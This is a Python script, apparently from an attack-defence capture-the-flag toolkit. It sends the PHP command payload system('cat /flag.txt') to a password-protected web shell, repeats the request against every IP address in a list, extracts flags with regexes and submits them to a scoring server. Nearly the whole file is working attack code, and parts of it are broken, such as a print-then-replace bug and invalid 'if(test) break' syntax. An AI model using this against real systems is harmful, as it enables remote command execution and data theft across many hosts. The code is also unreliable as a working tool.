# coding:utf-8
import sys;sys.path.append("..")
from core.ad_shell import *
import requests
import urlparse
import re
import config.config as config


# 获取攻击响应请求
def get_respose(url,password,shell_pass=""):
    payload="system('cat /flag.txt');"
    data={
        "pass" : shell_pass ,
        password : payload
    }
    
    r=requests.post(url,data=data)
    return r


# 格式化flag
def format_flag(res_text,mode,etc="32"):
    if mode == 1:
        patten="([0-9a-fA-F]{"+etc+"})"
        if re.search(patten , res_text):
            return re.search(patten , res_text).group()
    if mode == 2:
        patten="(flag\{.+?\})"
        if re.search(patten, res_text):
            return re.search(patten, res_text).group()
    if mode ==3:
        patten = etc
        if re.search(patten, res_text):
            return re.search(patten, res_text).group()


# 提交flag
def submit_flag(flag,ip):
    url = config.submit_url
    method = config.submit_method
    headers = config.submit_headers
    parm = config.submit_parm
    try:
        if method == 'post':
            data={
                "melee_ip": ip,
                parm:flag
            }
            r=requests.post(url,headers=headers,data=data)
        else :
            r=requests.get(url+parm+"="+flag,headers=headers)
    except:
        print("[X] {{ip}} can't be attack!").replace("{{ip}}", ip)
        return

    if(r.status_code != 200):
        print("[X] {{ip}} can't be attack! status_code={{code}}").replace("{{ip}}", ip).replace("{{code}}", r.status_code)
        return
    # print data
    if (config.submit_true in r.text):
        print("[+] Submit flag ok! ip: " + ip)
    else:
        print("[-] Submit flag flase! ip: " + ip)


# 攻击所有人
def get_all(url,password,test=0):

    url_change = urlparse.urlparse(url)
    try:
        res = get_respose(url,password,rand_shell_pass(url_change.netloc))
    except:
        print(r"you input is not ok!")
        return
    if(res.status_code != 200):
        print(r"you input is not ok!")
        return

    f=open("../ip").readlines()

    for i in f:
        ip=i[:-1]
        attack_url = url_change.scheme + "://" + ip + url_change.path+"?" + url_change.query
        shellpass = rand_shell_pass(ip)
        try:
            res = get_respose(attack_url,password,shellpass)
            print res.text
            flag = format_flag(res.text,config.flag_mode,config.flag_etc)
        except:
            print("[X] {{ip}} can't be attack!").replace("{{ip}}",ip)
            continue
        submit_flag(flag,ip)
        if(test) break


get_all("http://172.20.116.101/index.php",'123',1)

# if __name__=="__main__":

#     parser = argparse.ArgumentParser()
#     parser.add_argument("url", help="Please input url!",
#                         action="store")
#     parser.add_argument("-p", "--password", help="if static pass,you can input it.(eval pass)",
#                         action="store")
#     parser.add_argument("-p", "--shellpass", help="if static shell_pass,you can input it.(shell pass)",
#                         action="store")
#     parser.add_argument("-i", "--ip", help="attack ip.",
#                         action="store")
#     args = parser.parse_args()

#     url = args.url
#     if(args.password):
#         password = args.password
#         if(args.shellpass):
#             shellpass = args.password
#             get_respose(url,password,shellpass)
#         else:
#             get_respose(url, password)
#     else:
#         password = "sc0de"
#         get_all(url,password)

